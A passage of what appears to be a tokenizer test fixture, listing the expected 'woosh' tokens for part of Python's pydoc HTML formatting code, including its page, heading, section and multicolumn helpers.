woosh.Token(woosh.COMMENT, '# ------------------------------------------- HTML formatting utilities', 561, 4, 561, 75),
woosh.Token(woosh.NAME, '_repr_instance', 563, 4, 563, 18),
woosh.Token(woosh.OP, '=', 563, 19, 563, 20),
woosh.Token(woosh.NAME, 'HTMLRepr', 563, 21, 563, 29),
woosh.Token(woosh.OP, '(', 563, 29, 563, 30),
woosh.Token(woosh.OP, ')', 563, 30, 563, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 563, 31, 564, 0),
woosh.Token(woosh.NAME, 'repr', 564, 4, 564, 8),
woosh.Token(woosh.OP, '=', 564, 9, 564, 10),
woosh.Token(woosh.NAME, '_repr_instance', 564, 11, 564, 25),
woosh.Token(woosh.OP, '.', 564, 25, 564, 26),
woosh.Token(woosh.NAME, 'repr', 564, 26, 564, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 564, 30, 565, 0),
woosh.Token(woosh.NAME, 'escape', 565, 4, 565, 10),
woosh.Token(woosh.OP, '=', 565, 11, 565, 12),
woosh.Token(woosh.NAME, '_repr_instance', 565, 13, 565, 27),
woosh.Token(woosh.OP, '.', 565, 27, 565, 28),
woosh.Token(woosh.NAME, 'escape', 565, 28, 565, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 565, 34, 566, 0),
woosh.Token(woosh.NAME, 'def', 567, 4, 567, 7),
woosh.Token(woosh.NAME, 'page', 567, 8, 567, 12),
woosh.Token(woosh.OP, '(', 567, 12, 567, 13),
woosh.Token(woosh.NAME, 'self', 567, 13, 567, 17),
woosh.Token(woosh.OP, ',', 567, 17, 567, 18),
woosh.Token(woosh.NAME, 'title', 567, 19, 567, 24),
woosh.Token(woosh.OP, ',', 567, 24, 567, 25),
woosh.Token(woosh.NAME, 'contents', 567, 26, 567, 34),
woosh.Token(woosh.OP, ')', 567, 34, 567, 35),
woosh.Token(woosh.OP, ':', 567, 35, 567, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 567, 36, 568, 0),
woosh.Token(woosh.INDENT, ' ', 568, 0, 568, 8),
woosh.Token(woosh.STRING, '"""Format an HTML page."""', 568, 8, 568, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 568, 34, 569, 0),
woosh.Token(woosh.NAME, 'return', 569, 8, 569, 14),
woosh.Token(woosh.STRING, '\'\'\'\\\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">\r\n<html><head><title>Python: %s</title>\r\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8">\r\n</head><body bgcolor="#f0f0f8">\r\n%s\r\n</body></html>\'\'\'', 569, 15, 575, 17),
woosh.Token(woosh.OP, '%', 575, 18, 575, 19),
woosh.Token(woosh.OP, '(', 575, 20, 575, 21),
woosh.Token(woosh.NAME, 'title', 575, 21, 575, 26),
woosh.Token(woosh.OP, ',', 575, 26, 575, 27),
woosh.Token(woosh.NAME, 'contents', 575, 28, 575, 36),
woosh.Token(woosh.OP, ')', 575, 36, 575, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 575, 37, 576, 0),
woosh.Token(woosh.DEDENT, ' ', 577, 0, 577, 4),
woosh.Token(woosh.NAME, 'def', 577, 4, 577, 7),
woosh.Token(woosh.NAME, 'heading', 577, 8, 577, 15),
woosh.Token(woosh.OP, '(', 577, 15, 577, 16),
woosh.Token(woosh.NAME, 'self', 577, 16, 577, 20),
woosh.Token(woosh.OP, ',', 577, 20, 577, 21),
woosh.Token(woosh.NAME, 'title', 577, 22, 577, 27),
woosh.Token(woosh.OP, ',', 577, 27, 577, 28),
woosh.Token(woosh.NAME, 'fgcol', 577, 29, 577, 34),
woosh.Token(woosh.OP, ',', 577, 34, 577, 35),
woosh.Token(woosh.NAME, 'bgcol', 577, 36, 577, 41),
woosh.Token(woosh.OP, ',', 577, 41, 577, 42),
woosh.Token(woosh.NAME, 'extras', 577, 43, 577, 49),
woosh.Token(woosh.OP, '=', 577, 49, 577, 50),
woosh.Token(woosh.STRING, "''", 577, 50, 577, 52),
woosh.Token(woosh.OP, ')', 577, 52, 577, 53),
woosh.Token(woosh.OP, ':', 577, 53, 577, 54),
woosh.Token(woosh.NEWLINE, '\r\n', 577, 54, 578, 0),
woosh.Token(woosh.INDENT, ' ', 578, 0, 578, 8),
woosh.Token(woosh.STRING, '"""Format a page heading."""', 578, 8, 578, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 578, 36, 579, 0),
woosh.Token(woosh.NAME, 'return', 579, 8, 579, 14),
woosh.Token(woosh.STRING, '\'\'\'\r\n<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="heading">\r\n<tr bgcolor="%s">\r\n<td valign=bottom> <br>\r\n<font color="%s" face="helvetica, arial"> <br>%s</font></td\r\n><td align=right valign=bottom\r\n><font color="%s" face="helvetica, arial">%s</font></td></tr></table>\r\n \'\'\'', 579, 15, 586, 7),
woosh.Token(woosh.OP, '%', 586, 8, 586, 9),
woosh.Token(woosh.OP, '(', 586, 10, 586, 11),
woosh.Token(woosh.NAME, 'bgcol', 586, 11, 586, 16),
woosh.Token(woosh.OP, ',', 586, 16, 586, 17),
woosh.Token(woosh.NAME, 'fgcol', 586, 18, 586, 23),
woosh.Token(woosh.OP, ',', 586, 23, 586, 24),
woosh.Token(woosh.NAME, 'title', 586, 25, 586, 30),
woosh.Token(woosh.OP, ',', 586, 30, 586, 31),
woosh.Token(woosh.NAME, 'fgcol', 586, 32, 586, 37),
woosh.Token(woosh.OP, ',', 586, 37, 586, 38),
woosh.Token(woosh.NAME, 'extras', 586, 39, 586, 45),
woosh.Token(woosh.NAME, 'or', 586, 46, 586, 48),
woosh.Token(woosh.STRING, "' '", 586, 49, 586, 57),
woosh.Token(woosh.OP, ')', 586, 57, 586, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 586, 58, 587, 0),
woosh.Token(woosh.DEDENT, ' ', 588, 0, 588, 4),
woosh.Token(woosh.NAME, 'def', 588, 4, 588, 7),
woosh.Token(woosh.NAME, 'section', 588, 8, 588, 15),
woosh.Token(woosh.OP, '(', 588, 15, 588, 16),
woosh.Token(woosh.NAME, 'self', 588, 16, 588, 20),
woosh.Token(woosh.OP, ',', 588, 20, 588, 21),
woosh.Token(woosh.NAME, 'title', 588, 22, 588, 27),
woosh.Token(woosh.OP, ',', 588, 27, 588, 28),
woosh.Token(woosh.NAME, 'fgcol', 588, 29, 588, 34),
woosh.Token(woosh.OP, ',', 588, 34, 588, 35),
woosh.Token(woosh.NAME, 'bgcol', 588, 36, 588, 41),
woosh.Token(woosh.OP, ',', 588, 41, 588, 42),
woosh.Token(woosh.NAME, 'contents', 588, 43, 588, 51),
woosh.Token(woosh.OP, ',', 588, 51, 588, 52),
woosh.Token(woosh.NAME, 'width', 588, 53, 588, 58),
woosh.Token(woosh.OP, '=', 588, 58, 588, 59),
woosh.Token(woosh.NUMBER, '6', 588, 59, 588, 60),
woosh.Token(woosh.OP, ',', 588, 60, 588, 61),
woosh.Token(woosh.NAME, 'prelude', 589, 16, 589, 23),
woosh.Token(woosh.OP, '=', 589, 23, 589, 24),
woosh.Token(woosh.STRING, "''", 589, 24, 589, 26),
woosh.Token(woosh.OP, ',', 589, 26, 589, 27),
woosh.Token(woosh.NAME, 'marginalia', 589, 28, 589, 38),
woosh.Token(woosh.OP, '=', 589, 38, 589, 39),
woosh.Token(woosh.NAME, 'None', 589, 39, 589, 43),
woosh.Token(woosh.OP, ',', 589, 43, 589, 44),
woosh.Token(woosh.NAME, 'gap', 589, 45, 589, 48),
woosh.Token(woosh.OP, '=', 589, 48, 589, 49),
woosh.Token(woosh.STRING, "' '", 589, 49, 589, 57),
woosh.Token(woosh.OP, ')', 589, 57, 589, 58),
woosh.Token(woosh.OP, ':', 589, 58, 589, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 589, 59, 590, 0),
woosh.Token(woosh.INDENT, ' ', 590, 0, 590, 8),
woosh.Token(woosh.STRING, '"""Format a section with a heading."""', 590, 8, 590, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 590, 46, 591, 0),
woosh.Token(woosh.NAME, 'if', 591, 8, 591, 10),
woosh.Token(woosh.NAME, 'marginalia', 591, 11, 591, 21),
woosh.Token(woosh.NAME, 'is', 591, 22, 591, 24),
woosh.Token(woosh.NAME, 'None', 591, 25, 591, 29),
woosh.Token(woosh.OP, ':', 591, 29, 591, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 591, 30, 592, 0),
woosh.Token(woosh.INDENT, ' ', 592, 0, 592, 12),
woosh.Token(woosh.NAME, 'marginalia', 592, 12, 592, 22),
woosh.Token(woosh.OP, '=', 592, 23, 592, 24),
woosh.Token(woosh.STRING, "'<tt>'", 592, 25, 592, 31),
woosh.Token(woosh.OP, '+', 592, 32, 592, 33),
woosh.Token(woosh.STRING, "' '", 592, 34, 592, 42),
woosh.Token(woosh.OP, '*', 592, 43, 592, 44),
woosh.Token(woosh.NAME, 'width', 592, 45, 592, 50),
woosh.Token(woosh.OP, '+', 592, 51, 592, 52),
woosh.Token(woosh.STRING, "'</tt>'", 592, 53, 592, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 592, 60, 593, 0),
woosh.Token(woosh.DEDENT, ' ', 593, 0, 593, 8),
woosh.Token(woosh.NAME, 'result', 593, 8, 593, 14),
woosh.Token(woosh.OP, '=', 593, 15, 593, 16),
woosh.Token(woosh.STRING, '\'\'\'<p>\r\n<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="section">\r\n<tr bgcolor="%s">\r\n<td colspan=3 valign=bottom> <br>\r\n<font color="%s" face="helvetica, arial">%s</font></td></tr>\r\n \'\'\'', 593, 17, 598, 7),
woosh.Token(woosh.OP, '%', 598, 8, 598, 9),
woosh.Token(woosh.OP, '(', 598, 10, 598, 11),
woosh.Token(woosh.NAME, 'bgcol', 598, 11, 598, 16),
woosh.Token(woosh.OP, ',', 598, 16, 598, 17),
woosh.Token(woosh.NAME, 'fgcol', 598, 18, 598, 23),
woosh.Token(woosh.OP, ',', 598, 23, 598, 24),
woosh.Token(woosh.NAME, 'title', 598, 25, 598, 30),
woosh.Token(woosh.OP, ')', 598, 30, 598, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 598, 31, 599, 0),
woosh.Token(woosh.NAME, 'if', 599, 8, 599, 10),
woosh.Token(woosh.NAME, 'prelude', 599, 11, 599, 18),
woosh.Token(woosh.OP, ':', 599, 18, 599, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 599, 19, 600, 0),
woosh.Token(woosh.INDENT, ' ', 600, 0, 600, 12),
woosh.Token(woosh.NAME, 'result', 600, 12, 600, 18),
woosh.Token(woosh.OP, '=', 600, 19, 600, 20),
woosh.Token(woosh.NAME, 'result', 600, 21, 600, 27),
woosh.Token(woosh.OP, '+', 600, 28, 600, 29),
woosh.Token(woosh.STRING, '\'\'\'\r\n<tr bgcolor="%s"><td rowspan=2>%s</td>\r\n<td colspan=2>%s</td></tr>\r\n<tr><td>%s</td>\'\'\'', 600, 30, 603, 18),
woosh.Token(woosh.OP, '%', 603, 19, 603, 20),
woosh.Token(woosh.OP, '(', 603, 21, 603, 22),
woosh.Token(woosh.NAME, 'bgcol', 603, 22, 603, 27),
woosh.Token(woosh.OP, ',', 603, 27, 603, 28),
woosh.Token(woosh.NAME, 'marginalia', 603, 29, 603, 39),
woosh.Token(woosh.OP, ',', 603, 39, 603, 40),
woosh.Token(woosh.NAME, 'prelude', 603, 41, 603, 48),
woosh.Token(woosh.OP, ',', 603, 48, 603, 49),
woosh.Token(woosh.NAME, 'gap', 603, 50, 603, 53),
woosh.Token(woosh.OP, ')', 603, 53, 603, 54),
woosh.Token(woosh.NEWLINE, '\r\n', 603, 54, 604, 0),
woosh.Token(woosh.DEDENT, ' ', 604, 0, 604, 8),
woosh.Token(woosh.NAME, 'else', 604, 8, 604, 12),
woosh.Token(woosh.OP, ':', 604, 12, 604, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 604, 13, 605, 0),
woosh.Token(woosh.INDENT, ' ', 605, 0, 605, 12),
woosh.Token(woosh.NAME, 'result', 605, 12, 605, 18),
woosh.Token(woosh.OP, '=', 605, 19, 605, 20),
woosh.Token(woosh.NAME, 'result', 605, 21, 605, 27),
woosh.Token(woosh.OP, '+', 605, 28, 605, 29),
woosh.Token(woosh.STRING, '\'\'\'\r\n<tr><td bgcolor="%s">%s</td><td>%s</td>\'\'\'', 605, 30, 606, 42),
woosh.Token(woosh.OP, '%', 606, 43, 606, 44),
woosh.Token(woosh.OP, '(', 606, 45, 606, 46),
woosh.Token(woosh.NAME, 'bgcol', 606, 46, 606, 51),
woosh.Token(woosh.OP, ',', 606, 51, 606, 52),
woosh.Token(woosh.NAME, 'marginalia', 606, 53, 606, 63),
woosh.Token(woosh.OP, ',', 606, 63, 606, 64),
woosh.Token(woosh.NAME, 'gap', 606, 65, 606, 68),
woosh.Token(woosh.OP, ')', 606, 68, 606, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 606, 69, 607, 0),
woosh.Token(woosh.DEDENT, ' ', 608, 0, 608, 8),
woosh.Token(woosh.NAME, 'return', 608, 8, 608, 14),
woosh.Token(woosh.NAME, 'result', 608, 15, 608, 21),
woosh.Token(woosh.OP, '+', 608, 22, 608, 23),
woosh.Token(woosh.STRING, '\'\\n<td width="100%%">%s</td></tr></table>\'', 608, 24, 608, 66),
woosh.Token(woosh.OP, '%', 608, 67, 608, 68),
woosh.Token(woosh.NAME, 'contents', 608, 69, 608, 77),
woosh.Token(woosh.NEWLINE, '\r\n', 608, 77, 609, 0),
woosh.Token(woosh.DEDENT, ' ', 610, 0, 610, 4),
woosh.Token(woosh.NAME, 'def', 610, 4, 610, 7),
woosh.Token(woosh.NAME, 'bigsection', 610, 8, 610, 18),
woosh.Token(woosh.OP, '(', 610, 18, 610, 19),
woosh.Token(woosh.NAME, 'self', 610, 19, 610, 23),
woosh.Token(woosh.OP, ',', 610, 23, 610, 24),
woosh.Token(woosh.NAME, 'title', 610, 25, 610, 30),
woosh.Token(woosh.OP, ',', 610, 30, 610, 31),
woosh.Token(woosh.OP, '*', 610, 32, 610, 33),
woosh.Token(woosh.NAME, 'args', 610, 33, 610, 37),
woosh.Token(woosh.OP, ')', 610, 37, 610, 38),
woosh.Token(woosh.OP, ':', 610, 38, 610, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 610, 39, 611, 0),
woosh.Token(woosh.INDENT, ' ', 611, 0, 611, 8),
woosh.Token(woosh.STRING, '"""Format a section with a big heading."""', 611, 8, 611, 50),
woosh.Token(woosh.NEWLINE, '\r\n', 611, 50, 612, 0),
woosh.Token(woosh.NAME, 'title', 612, 8, 612, 13),
woosh.Token(woosh.OP, '=', 612, 14, 612, 15),
woosh.Token(woosh.STRING, "'<big><strong>%s</strong></big>'", 612, 16, 612, 48),
woosh.Token(woosh.OP, '%', 612, 49, 612, 50),
woosh.Token(woosh.NAME, 'title', 612, 51, 612, 56),
woosh.Token(woosh.NEWLINE, '\r\n', 612, 56, 613, 0),
woosh.Token(woosh.NAME, 'return', 613, 8, 613, 14),
woosh.Token(woosh.NAME, 'self', 613, 15, 613, 19),
woosh.Token(woosh.OP, '.', 613, 19, 613, 20),
woosh.Token(woosh.NAME, 'section', 613, 20, 613, 27),
woosh.Token(woosh.OP, '(', 613, 27, 613, 28),
woosh.Token(woosh.NAME, 'title', 613, 28, 613, 33),
woosh.Token(woosh.OP, ',', 613, 33, 613, 34),
woosh.Token(woosh.OP, '*', 613, 35, 613, 36),
woosh.Token(woosh.NAME, 'args', 613, 36, 613, 40),
woosh.Token(woosh.OP, ')', 613, 40, 613, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 613, 41, 614, 0),
woosh.Token(woosh.DEDENT, ' ', 615, 0, 615, 4),
woosh.Token(woosh.NAME, 'def', 615, 4, 615, 7),
woosh.Token(woosh.NAME, 'preformat', 615, 8, 615, 17),
woosh.Token(woosh.OP, '(', 615, 17, 615, 18),
woosh.Token(woosh.NAME, 'self', 615, 18, 615, 22),
woosh.Token(woosh.OP, ',', 615, 22, 615, 23),
woosh.Token(woosh.NAME, 'text', 615, 24, 615, 28),
woosh.Token(woosh.OP, ')', 615, 28, 615, 29),
woosh.Token(woosh.OP, ':', 615, 29, 615, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 615, 30, 616, 0),
woosh.Token(woosh.INDENT, ' ', 616, 0, 616, 8),
woosh.Token(woosh.STRING, '"""Format literal preformatted text."""', 616, 8, 616, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 616, 47, 617, 0),
woosh.Token(woosh.NAME, 'text', 617, 8, 617, 12),
woosh.Token(woosh.OP, '=', 617, 13, 617, 14),
woosh.Token(woosh.NAME, 'self', 617, 15, 617, 19),
woosh.Token(woosh.OP, '.', 617, 19, 617, 20),
woosh.Token(woosh.NAME, 'escape', 617, 20, 617, 26),
woosh.Token(woosh.OP, '(', 617, 26, 617, 27),
woosh.Token(woosh.NAME, 'text', 617, 27, 617, 31),
woosh.Token(woosh.OP, '.', 617, 31, 617, 32),
woosh.Token(woosh.NAME, 'expandtabs', 617, 32, 617, 42),
woosh.Token(woosh.OP, '(', 617, 42, 617, 43),
woosh.Token(woosh.OP, ')', 617, 43, 617, 44),
woosh.Token(woosh.OP, ')', 617, 44, 617, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 617, 45, 618, 0),
woosh.Token(woosh.NAME, 'return', 618, 8, 618, 14),
woosh.Token(woosh.NAME, 'replace', 618, 15, 618, 22),
woosh.Token(woosh.OP, '(', 618, 22, 618, 23),
woosh.Token(woosh.NAME, 'text', 618, 23, 618, 27),
woosh.Token(woosh.OP, ',', 618, 27, 618, 28),
woosh.Token(woosh.STRING, "'\\n\\n'", 618, 29, 618, 35),
woosh.Token(woosh.OP, ',', 618, 35, 618, 36),
woosh.Token(woosh.STRING, "'\\n \\n'", 618, 37, 618, 44),
woosh.Token(woosh.OP, ',', 618, 44, 618, 45),
woosh.Token(woosh.STRING, "'\\n\\n'", 618, 46, 618, 52),
woosh.Token(woosh.OP, ',', 618, 52, 618, 53),
woosh.Token(woosh.STRING, "'\\n \\n'", 618, 54, 618, 61),
woosh.Token(woosh.OP, ',', 618, 61, 618, 62),
woosh.Token(woosh.STRING, "' '", 619, 29, 619, 32),
woosh.Token(woosh.OP, ',', 619, 32, 619, 33),
woosh.Token(woosh.STRING, "' '", 619, 34, 619, 42),
woosh.Token(woosh.OP, ',', 619, 42, 619, 43),
woosh.Token(woosh.STRING, "'\\n'", 619, 44, 619, 48),
woosh.Token(woosh.OP, ',', 619, 48, 619, 49),
woosh.Token(woosh.STRING, "'<br>\\n'", 619, 50, 619, 58),
woosh.Token(woosh.OP, ')', 619, 58, 619, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 619, 59, 620, 0),
woosh.Token(woosh.DEDENT, ' ', 621, 0, 621, 4),
woosh.Token(woosh.NAME, 'def', 621, 4, 621, 7),
woosh.Token(woosh.NAME, 'multicolumn', 621, 8, 621, 19),
woosh.Token(woosh.OP, '(', 621, 19, 621, 20),
woosh.Token(woosh.NAME, 'self', 621, 20, 621, 24),
woosh.Token(woosh.OP, ',', 621, 24, 621, 25),
woosh.Token(woosh.NAME, 'list', 621, 26, 621, 30),
woosh.Token(woosh.OP, ',', 621, 30, 621, 31),
woosh.Token(woosh.NAME, 'format', 621, 32, 621, 38),
woosh.Token(woosh.OP, ',', 621, 38, 621, 39),
woosh.Token(woosh.NAME, 'cols', 621, 40, 621, 44),
woosh.Token(woosh.OP, '=', 621, 44, 621, 45),
woosh.Token(woosh.NUMBER, '4', 621, 45, 621, 46),
woosh.Token(woosh.OP, ')', 621, 46, 621, 47),
woosh.Token(woosh.OP, ':', 621, 47, 621, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 621, 48, 622, 0),
woosh.Token(woosh.INDENT, ' ', 622, 0, 622, 8),
woosh.Token(woosh.STRING, '"""Format a list of items into a multi-column list."""', 622, 8, 622, 62),
woosh.Token(woosh.NEWLINE, '\r\n', 622, 62, 623, 0),
woosh.Token(woosh.NAME, 'result', 623, 8, 623, 14),
woosh.Token(woosh.OP, '=', 623, 15, 623, 16),
woosh.Token(woosh.STRING, "''", 623, 17, 623, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 623, 19, 624, 0),
woosh.Token(woosh.NAME, 'rows', 624, 8, 624, 12),
woosh.Token(woosh.OP, '=', 624, 13, 624, 14),
woosh.Token(woosh.OP, '(', 624, 15, 624, 16),
woosh.Token(woosh.NAME, 'len', 624, 16, 624, 19),
woosh.Token(woosh.OP, '(', 624, 19, 624, 20),
woosh.Token(woosh.NAME, 'list', 624, 20, 624, 24),
woosh.Token(woosh.OP, ')', 624, 24, 624, 25),
woosh.Token(woosh.OP, '+', 624, 25, 624, 26),
woosh.Token(woosh.NAME, 'cols', 624, 26, 624, 30),
woosh.Token(woosh.OP, '-', 624, 30, 624, 31),
woosh.Token(woosh.NUMBER, '1', 624, 31, 624, 32),
woosh.Token(woosh.OP, ')', 624, 32, 624, 33),
woosh.Token(woosh.OP, '//', 624, 33, 624, 35),
woosh.Token(woosh.NAME, 'cols', 624, 35, 624, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 624, 39, 625, 0),
woosh.Token(woosh.NAME, 'for', 625, 8, 625, 11),
woosh.Token(woosh.NAME, 'col', 625, 12, 625, 15),
woosh.Token(woosh.NAME, 'in', 625, 16, 625, 18),
woosh.Token(woosh.NAME, 'range', 625, 19, 625, 24),
woosh.Token(woosh.OP, '(', 625, 24, 625, 25),
woosh.Token(woosh.NAME, 'cols', 625, 25, 625, 29),
woosh.Token(woosh.OP, ')', 625, 29, 625, 30),
woosh.Token(woosh.OP, ':', 625, 30, 625, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 625, 31, 626, 0),
woosh.Token(woosh.INDENT, ' ', 626, 0, 626, 12),
woosh.Token(woosh.NAME, 'result', 626, 12, 626, 18),
woosh.Token(woosh.OP, '=', 626, 19, 626, 20),
woosh.Token(woosh.NAME, 'result', 626, 21, 626, 27),
woosh.Token(woosh.OP, '+', 626, 28, 626, 29),
woosh.Token(woosh.STRING, '\'<td width="%d%%" valign=top>\'', 626, 30, 626, 60),
woosh.Token(woosh.OP, '%', 626, 61, 626, 62),
woosh.Token(woosh.OP, '(', 626, 63, 626, 64),
woosh.Token(woosh.NUMBER, '100', 626, 64, 626, 67),
woosh.Token(woosh.OP, '//', 626, 67, 626, 69),
woosh.Token(woosh.NAME, 'cols', 626, 69, 626, 73),
woosh.Token(woosh.OP, ')', 626, 73, 626, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 626, 74, 627, 0),
woosh.Token(woosh.NAME, 'for', 627, 12, 627, 15),
woosh.Token(woosh.NAME, 'i', 627, 16, 627, 17),
woosh.Token(woosh.NAME, 'in', 627, 18, 627, 20),
woosh.Token(woosh.NAME, 'range', 627, 21, 627, 26),
woosh.Token(woosh.OP, '(', 627, 26, 627, 27),
woosh.Token(woosh.NAME, 'rows', 627, 27, 627, 31),
woosh.Token(woosh.OP, '*', 627, 31, 627, 32),
woosh.Token(woosh.NAME, 'col', 627, 32, 627, 35),
woosh.Token(woosh.OP, ',', 627, 35, 627, 36),
woosh.Token(woosh.NAME, 'rows', 627, 37, 627, 41),
woosh.Token(woosh.OP, '*', 627, 41, 627, 42),
woosh.Token(woosh.NAME, 'col', 627, 42, 627, 45),
woosh.Token(woosh.OP, '+', 627, 45, 627, 46),
woosh.Token(woosh.NAME, 'rows', 627, 46, 627, 50),
woosh.Token(woosh.OP, ')', 627, 50, 627, 51),
woosh.Token(woosh.OP, ':', 627, 51, 627, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 627, 52, 628, 0),
woosh.Token(woosh.INDENT, ' ', 628, 0, 628, 16),
woosh.Token(woosh.NAME, 'if', 628, 16, 628, 18),
woosh.Token(woosh.NAME, 'i', 628, 19, 628, 20),
woosh.Token(woosh.OP, '<', 628, 21, 628, 22),
woosh.Token(woosh.NAME, 'len', 628, 23, 628, 26),
woosh.Token(woosh.OP, '(', 628, 26, 628, 27),
woosh.Token(woosh.NAME, 'list', 628, 27, 628, 31),
woosh.Token(woosh.OP, ')', 628, 31, 628, 32),
woosh.Token(woosh.OP, ':', 628, 32, 628, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 628, 33, 629, 0),
woosh.Token(woosh.INDENT, ' ', 629, 0, 629, 20),
woosh.Token(woosh.NAME, 'result', 629, 20, 629, 26),
woosh.Token(woosh.OP, '=', 629, 27, 629, 28),
woosh.Token(woosh.NAME, 'result', 629, 29, 629, 35),
woosh.Token(woosh.OP, '+', 629, 36, 629, 37),
woosh.Token(woosh.NAME, 'format', 629, 38, 629, 44),
woosh.Token(woosh.OP, '(', 629, 44, 629, 45),
woosh.Token(woosh.NAME, 'list', 629, 45, 629, 49),
woosh.Token(woosh.OP, '[', 629, 49, 629, 50),
woosh.Token(woosh.NAME, 'i', 629, 50, 629, 51),
woosh.Token(woosh.OP, ']', 629, 51, 629, 52),
woosh.Token(woosh.OP, ')', 629, 52, 629, 53),
woosh.Token(woosh.OP, '+', 629, 54, 629, 55),
woosh.Token(woosh.STRING, "'<br>\\n'", 629, 56, 629, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 629, 64, 630, 0),
woosh.Token(woosh.DEDENT, ' ', 630, 0, 630, 12),
woosh.Token(woosh.DEDENT, '', 630, 12, 630, 12),
woosh.Token(woosh.NAME, 'result', 630, 12, 630, 18),
woosh.Token(woosh.OP, '=', 630, 19, 630, 20),
woosh.Token(woosh.NAME, 'result', 630, 21, 630, 27),
woosh.Token(woosh.OP, '+', 630, 28, 630, 29),
woosh.Token(woosh.STRING, "'</td>'", 630, 30, 630, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 630, 37, 631, 0),
woosh.Token(woosh.DEDENT, ' ', 631, 0, 631, 8),
woosh.Token(woosh.NAME, 'return', 631, 8, 631, 14),
woosh.Token(woosh.STRING, '\'<table width="100%%" summary="list"><tr>%s</tr></table>\'', 631, 15, 631, 72),
woosh.Token(woosh.OP, '%', 631, 73, 631, 74),
woosh.Token(woosh.NAME, 'result', 631, 75, 631, 81),
woosh.Token(woosh.NEWLINE, '\r\n', 631, 81, 632, 0),
woosh.Token(woosh.DEDENT, ' ', 633, 0, 633, 4),
woosh.Token(woosh.NAME, 'def', 633, 4, 633, 7),
woosh.Token(woosh.NAME, 'grey', 633, 8, 633, 12),
woosh.Token(woosh.OP, '(', 633, 12, 633, 13),
woosh.Token(woosh.NAME, 'self', 633, 13, 633, 17),
woosh.Token(woosh.OP, ',', 633, 17, 633, 18),
woosh.Token(woosh.NAME, 'text', 633, 19, 633, 23),
woosh.Token(woosh.OP, ')', 633, 23, 633, 24),
woosh.Token(woosh.OP, ':', 633, 24, 633, 25),
woosh.Token(woosh.NAME, 'return', 633, 26, 633, 32),
woosh.Token(woosh.STRING, '\'<font color="#909090">%s</font>\'', 633, 33, 633, 66),
woosh.Token(woosh.OP, '%', 633, 67, 633, 68),
woosh.Token(woosh.NAME, 'text', 633, 69, 633, 73),
woosh.Token(woosh.NEWLINE, '\r\n', 633, 73, 634, 0),
woosh.Token(woosh.NAME, 'def', 635, 4, 635, 7),
woosh.Token(woosh.NAME, 'namelink', 635, 8, 635, 16),
woosh.Token(woosh.OP, '(', 635, 16, 635, 17),
woosh.Token(woosh.NAME, 'self', 635, 17, 635, 21),
woosh.Token(woosh.OP, ',', 635, 21, 635, 22),
woosh.Token(woosh.NAME, 'name', 635, 23, 635, 27),
woosh.Token(woosh.OP, ',', 635, 27, 635, 28),
woosh.Token(woosh.OP, '*', 635, 29, 635, 30),
woosh.Token(woosh.NAME, 'dicts', 635, 30, 635, 35),
woosh.Token(woosh.OP, ')', 635, 35, 635, 36),
woosh.Token(woosh.OP, ':', 635, 36, 635, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 635, 37, 636, 0),
woosh.Token(woosh.INDENT, ' ', 636, 0, 636, 8),
woosh.Token(woosh.STRING, '"""Make a link for an identifier, given name-to-URL mappings."""', 636, 8, 636, 72),
woosh.Token(woosh.NEWLINE, '\r\n', 636, 72, 637, 0),
woosh.Token(woosh.NAME, 'for', 637, 8, 637, 11),
woosh.Token(woosh.NAME, 'dict', 637, 12, 637, 16),
woosh.Token(woosh.NAME, 'in', 637, 17, 637, 19),
woosh.Token(woosh.NAME, 'dicts', 637, 20, 637, 25),
woosh.Token(woosh.OP, ':', 637, 25, 637, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 637, 26, 638, 0),
woosh.Token(woosh.INDENT, ' ', 638, 0, 638, 12),
woosh.Token(woosh.NAME, 'if', 638, 12, 638, 14),
woosh.Token(woosh.NAME, 'name', 638, 15, 638, 19),
woosh.Token(woosh.NAME, 'in', 638, 20, 638, 22),
woosh.Token(woosh.NAME, 'dict', 638, 23, 638, 27),
woosh.Token(woosh.OP, ':', 638, 27, 638, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 638, 28, 639, 0),
woosh.Token(woosh.INDENT, ' ', 639, 0, 639, 16),
woosh.Token(woosh.NAME, 'return', 639, 16, 639, 22),
woosh.Token(woosh.STRING, '\'<a href="%s">%s</a>\'', 639, 23, 639, 44),
woosh.Token(woosh.OP, '%', 639, 45, 639, 46),
woosh.Token(woosh.OP, '(', 639, 47, 639, 48),
woosh.Token(woosh.NAME, 'dict', 639, 48, 639, 52),
woosh.Token(woosh.OP, '[', 639, 52, 639, 53),
woosh.Token(woosh.NAME, 'name', 639, 53, 639, 57),
woosh.Token(woosh.OP, ']', 639, 57, 639, 58),
woosh.Token(woosh.OP, ',', 639, 58, 639, 59),
